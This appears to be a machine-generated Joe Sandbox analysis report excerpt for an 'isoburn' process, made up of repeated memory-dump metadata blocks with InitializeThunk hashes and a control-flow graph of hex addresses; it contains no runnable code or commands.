                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 0eef97e5ead837ccfa5246fa851c1d7aee92900bfcbe36b728cc8cdd97a643b1
                                                                                                                            • Instruction ID: 2eb4444002d3f955e26950e46169e7780786296cc25ff4e3bb6d23ae1d541583
                                                                                                                            • Opcode Fuzzy Hash: 0eef97e5ead837ccfa5246fa851c1d7aee92900bfcbe36b728cc8cdd97a643b1
                                                                                                                            • Instruction Fuzzy Hash: CD90022A21340002E1807158A44860F00158BD1212FE5D415B8015558CC9158D695721
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9df28b99c7de7ac1c9478975bcb821b6fbf297f7434c97fa97ca029755abcbbd
                                                                                                                            • Instruction ID: 15f3aa509f08bc3e30c80b1de2001fa0492fc5579ff0e0f920a21a269b295eb3
                                                                                                                            • Opcode Fuzzy Hash: 9df28b99c7de7ac1c9478975bcb821b6fbf297f7434c97fa97ca029755abcbbd
                                                                                                                            • Instruction Fuzzy Hash: 7090022230140003E1407158A45860B4015DBE1311FA5D011F8414554CD9158D565622
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: da25d9e66c6fe31ded42e5e60556711fe5d6cd64a25c93fbe9ad83e8c0c8d89d
                                                                                                                            • Instruction ID: afb8310262c11e600db0d02edc61ec05434a3e6da94523f650b430082047a97d
                                                                                                                            • Opcode Fuzzy Hash: da25d9e66c6fe31ded42e5e60556711fe5d6cd64a25c93fbe9ad83e8c0c8d89d
                                                                                                                            • Instruction Fuzzy Hash: C5900222242441526545B158944450B40169BE02517E5C012B9414950C85269D56DA21
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 68ba8a57e98093551567254a0599849446957204452c43edcfd612f7a07a53dc
                                                                                                                            • Instruction ID: 7b2295714a2fef0cd0f6354b63dc66834eac72198da2754643bc10eb4a34dea9
                                                                                                                            • Opcode Fuzzy Hash: 68ba8a57e98093551567254a0599849446957204452c43edcfd612f7a07a53dc
                                                                                                                            • Instruction Fuzzy Hash: CC90023220140413E1117158954470B00198BD0251FE5C412B8424558D96568E52A521
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 13c2d7f6a2451f150d9242b6e8045e5ba428a70355a6838465ded692020720de
                                                                                                                            • Instruction ID: 0d35c6a558276bd2ca12451bdc5724ee7202559ccdc22b08e237546b6af42d8a
                                                                                                                            • Opcode Fuzzy Hash: 13c2d7f6a2451f150d9242b6e8045e5ba428a70355a6838465ded692020720de
                                                                                                                            • Instruction Fuzzy Hash: FD90023220140842E10071589444B4B00158BE0311FA5C016B8124654D8615CD517921
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 1f05ad9f3cf9e6b360278983d99512548a75c78dc9abc5c666c5f3e2eb0764da
                                                                                                                            • Instruction ID: d8f65d0dc81e4944e33c92b3588a3cf4069b1d7bfc650dfb1e1b88404d0569ba
                                                                                                                            • Opcode Fuzzy Hash: 1f05ad9f3cf9e6b360278983d99512548a75c78dc9abc5c666c5f3e2eb0764da
                                                                                                                            • Instruction Fuzzy Hash: CD90023220148802E1107158D44474F00158BD0311FA9C411BC424658D86958D917521
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 99ff60bcef91945d9664c0f51b2e7a69b5d8f5470a938cb22d889c8fa7a5c149
                                                                                                                            • Instruction ID: 82b4533bd2b847a7e189e78d5d02132cb6c212b285f60a6a46a7ad929307726d
                                                                                                                            • Opcode Fuzzy Hash: 99ff60bcef91945d9664c0f51b2e7a69b5d8f5470a938cb22d889c8fa7a5c149
                                                                                                                            • Instruction Fuzzy Hash: 9F90023220140402E1007598A44864B00158BE0311FA5D011BD024555EC6658D916531
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: a4896a8fe6acf2a4a4332c7bcc6128b6249dac0fd94964baadbddec12d04dc08
                                                                                                                            • Instruction ID: 189dfa121cd4d93a92f4bf60ff0e58be10723c589a10f5fb68bba750e113db22
                                                                                                                            • Opcode Fuzzy Hash: a4896a8fe6acf2a4a4332c7bcc6128b6249dac0fd94964baadbddec12d04dc08
                                                                                                                            • Instruction Fuzzy Hash: 7590026234140442E10071589454B0B0015CBE1311FA5C015F9064554D8619CD526526
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 266afdcf22a7498e622888878355d1766ebb09c1bbd930175c76394334d771ef
                                                                                                                            • Instruction ID: a9adb0fa77b19ba01ccf8b004f24145d8cc510db039e95358498b54bdf4253a4
                                                                                                                            • Opcode Fuzzy Hash: 266afdcf22a7498e622888878355d1766ebb09c1bbd930175c76394334d771ef
                                                                                                                            • Instruction Fuzzy Hash: 8E9002226014004251407168D88490B4015AFE12217A5C121B8998550D85598D655A65
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 5e1fac69c9f628ec59f4b49db9b6d18cda74974875dcecb476b2fd880b0b6b43
                                                                                                                            • Instruction ID: 6ed0c9d16e642f118faba49b42d93bb01f00184ddb4c2c97e184eea7dc98e0d3
                                                                                                                            • Opcode Fuzzy Hash: 5e1fac69c9f628ec59f4b49db9b6d18cda74974875dcecb476b2fd880b0b6b43
                                                                                                                            • Instruction Fuzzy Hash: 99900222211C0042E20075689C54B0B00158BD0313FA5C115B8154554CC9158D615921
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 48900fca7fc05f0547430222cb4a29d725b7571a37a598a421fbaf4a1ceddd69
                                                                                                                            • Instruction ID: e454a7bda82aa8f3c8350dd52998dc987f791803d267d628a791e71248a8c472
                                                                                                                            • Opcode Fuzzy Hash: 48900fca7fc05f0547430222cb4a29d725b7571a37a598a421fbaf4a1ceddd69
                                                                                                                            • Instruction Fuzzy Hash: 6490022260140502E1017158944461B001A8BD0251FE5C022B9024555ECA258E92A531
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 93aaf603e2c35378cc5ece2e39ad1f18e85b7ec29dfb23fe5e785ede9a842ac3
                                                                                                                            • Instruction ID: 348936d549ba376f785777a9b70dd153a1867c2ff7e8f3bce3869b2ee49d3d4d
                                                                                                                            • Opcode Fuzzy Hash: 93aaf603e2c35378cc5ece2e39ad1f18e85b7ec29dfb23fe5e785ede9a842ac3
                                                                                                                            • Instruction Fuzzy Hash: B790026220180403E1407558984460B00158BD0312FA5C011BA064555E8A298D516535
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 9a8f3cc99b18a469f419b33f624d0c5dd2af380a47d7d218a1cf3c870602c7ee
                                                                                                                            • Instruction ID: 44407a7a838877254ee657c45190adb39966c9905fdf0ce8192edb8c33268d74
                                                                                                                            • Opcode Fuzzy Hash: 9a8f3cc99b18a469f419b33f624d0c5dd2af380a47d7d218a1cf3c870602c7ee
                                                                                                                            • Instruction Fuzzy Hash: 269002622024000351057158945461B401A8BE0211BA5C021F9014590DC5258D916525
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 6cbd19b29d5f782f533c4e96c692c92494d502356769cc868484ad2f95eb2029
                                                                                                                            • Instruction ID: 4019efb8ea4492921f49a9414a8914e9bcd64d6b493439b7025b9b68b2c26c00
                                                                                                                            • Opcode Fuzzy Hash: 6cbd19b29d5f782f533c4e96c692c92494d502356769cc868484ad2f95eb2029
                                                                                                                            • Instruction Fuzzy Hash: F090023260540802E1507158945474B00158BD0311FA5C011B8024654D87558F557AA1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: ba46945ba1c8d64725c86887f0280f2ab1f32026686d57094b1cca7f89894dc1
                                                                                                                            • Instruction ID: e6cf3490d118802e3e4c86833e6b8ed2c3de253c8dc935f9f313ca34cf07e1a0
                                                                                                                            • Opcode Fuzzy Hash: ba46945ba1c8d64725c86887f0280f2ab1f32026686d57094b1cca7f89894dc1
                                                                                                                            • Instruction Fuzzy Hash: 2590023220544842E14071589444A4B00258BD0315FA5C011B8064694D96258E55BA61
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 3ceb81dd2461b35d736dbc27db81eb8f845ae0d9ce1ea489013ab60d221e1ee1
                                                                                                                            • Instruction ID: 1874806f66243c59085f13789a6d05d6d228dec3d280dcfe9bbeb4df63f118da
                                                                                                                            • Opcode Fuzzy Hash: 3ceb81dd2461b35d736dbc27db81eb8f845ae0d9ce1ea489013ab60d221e1ee1
                                                                                                                            • Instruction Fuzzy Hash: D590023220140802E1807158944464F00158BD1311FE5C015B8025654DCA158F597BA1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 53849f383d92ac75ed190a965ac6a140525607d41e81a1c93f6ce37cbcf9c24f
                                                                                                                            • Instruction ID: 46ea9a621ec84008722db015f4852fa6b1d07018855dd7f8f7ca3669a6ad1fb0
                                                                                                                            • Opcode Fuzzy Hash: 53849f383d92ac75ed190a965ac6a140525607d41e81a1c93f6ce37cbcf9c24f
                                                                                                                            • Instruction Fuzzy Hash: 0E900226211400031105B558574450B00568BD53613A5C021F9015550CD6218D615521
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: d2c664c15c5ffd950c0d0e37373ac1428e18a8ada393a2ad3904194f8f1f65bf
                                                                                                                            • Instruction ID: ab5c54b5019840df77d46f9bad0f8d1a5cc0c7549d5642c46bd6c05bd79f857c
                                                                                                                            • Opcode Fuzzy Hash: d2c664c15c5ffd950c0d0e37373ac1428e18a8ada393a2ad3904194f8f1f65bf
                                                                                                                            • Instruction Fuzzy Hash: 3C900226221400021145B558564450F04559BD63613E5C015F9416590CC6218D655721
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 8cdcd01a886930e19c93ed18113a6abd60a3778d52d3d9253e3f0c0ba0bfb1b6
                                                                                                                            • Instruction ID: 8c8f81a0c355513871cb7302628b5330dfc9c8dde53eda0f7b6029fa8f48d094
                                                                                                                            • Opcode Fuzzy Hash: 8cdcd01a886930e19c93ed18113a6abd60a3778d52d3d9253e3f0c0ba0bfb1b6
                                                                                                                            • Instruction Fuzzy Hash: FB90023260550402E1007158955470B10158BD0211FB5C411B8424568D87958E5169A2
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: fe5680591b90d83786151b9979201c4b351673abcf0db3268d0d0af7ae251790
                                                                                                                            • Instruction ID: d61f848934136abaac7ff64372945f48d561232c0c09b0585888c37266ab954d
                                                                                                                            • Opcode Fuzzy Hash: fe5680591b90d83786151b9979201c4b351673abcf0db3268d0d0af7ae251790
                                                                                                                            • Instruction Fuzzy Hash: E190022224545102E150715C944461B4015ABE0211FA5C021B8814594D85558D556621

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 28 2d19e36-2d19e37 29 2d19e39-2d1a152 28->29 30 2d19e0c-2d19e11 28->30 31 2d1a15c-2d1a163 29->31 32 2d19e30-2d19e35 30->32 33 2d19e13-2d19e2f call 2d3ca47 CreateThread 30->33 35 2d1a165-2d1a19c 31->35 36 2d1a19e 31->36 35->31 38 2d1a1a5-2d1a1af 36->38 39 2d1a1b1-2d1a1cb 38->39 40 2d1a1e7-2d1a1f0 38->40 41 2d1a1d2-2d1a1d4 39->41 42 2d1a1cd-2d1a1d1 39->42 43 2d1a1f2-2d1a204 40->43 44 2d1a206-2d1a210 40->44 45 2d1a1e5 41->45 46 2d1a1d6-2d1a1df 41->46 42->41 43->40 47 2d1a221-2d1a22d 44->47 45->38 46->45 48 2d1a23d-2d1a241 47->48 49 2d1a22f-2d1a23b 47->49 50 2d1a243-2d1a25a 48->50 51 2d1a25c-2d1a274 48->51 49->47 50->48 53 2d1a285-2d1a291 51->53 54 2d1a293-2d1a2a6 53->54 55 2d1a2a8-2d1a2b2 53->55 54->53 56 2d1a2c3-2d1a2cf 55->56 58 2d1a2d1-2d1a2e3 56->58 59 2d1a2e5-2d1a2ee 56->59 58->56 60 2d1a510-2d1a517 59->60 61 2d1a2f4-2d1a2f7 59->61 63 2d1a519-2d1a548 60->63 64 2d1a54a-2d1a551 60->64 65 2d1a2fd-2d1a304 61->65 63->60 66 2d1a5c3-2d1a5cd 64->66 67 2d1a553-2d1a55d 64->67 68 2d1a306-2d1a329 65->68 69 2d1a32b-2d1a335 65->69 72 2d1a5de-2d1a5e7 66->72 70 2d1a56e-2d1a57a 67->70 68->65 71 2d1a346-2d1a352 69->71 73 2d1a58d call 2d3b0e0 70->73 74 2d1a57c-2d1a58b 70->74 75 2d1a365-2d1a36c 71->75 76 2d1a354-2d1a363 71->76 77 2d1a5e9-2d1a5fc 72->77 78 2d1a5fe-2d1a607 72->78 86 2d1a592-2d1a59e 73->86 79 2d1a55f-2d1a568 74->79 81 2d1a393-2d1a39d 75->81 82 2d1a36e-2d1a391 75->82 76->71 77->72 79->70 85 2d1a3ae-2d1a3ba 81->85 82->75 87 2d1a3cb-2d1a3da 85->87 88 2d1a3bc-2d1a3c9 85->88 86->66 89 2d1a5a0-2d1a5c1 86->89 90 2d1a40d-2d1a417 87->90 91 2d1a3dc-2d1a3e3 87->91 88->85 89->86 95 2d1a428-2d1a434 90->95 93 2d1a3e5-2d1a3fb 91->93 94 2d1a408 91->94 96 2d1a406 93->96 97 2d1a3fd-2d1a403 93->97 94->60 98 2d1a436-2d1a448 95->98 99 2d1a44a-2d1a454 95->99 96->91 97->96 98->95 100 2d1a465-2d1a471 99->100 102 2d1a493-2d1a499 100->102 103 2d1a473-2d1a480 100->103 106 2d1a49d-2d1a4a4 102->106 104 2d1a491 103->104 105 2d1a482-2d1a48b 103->105 104->100 105->104 108 2d1a4a6-2d1a4bc 106->108 109 2d1a4c9-2d1a4d3 106->109 110 2d1a4c7 108->110 111 2d1a4be-2d1a4c4 108->111 112 2d1a4e4-2d1a4ed 109->112 110->106 111->110 113 2d1a50b 112->113 114 2d1a4ef-2d1a4fb 112->114 113->59 115 2d1a509 114->115 116 2d1a4fd-2d1a503 114->116 115->112 116->115
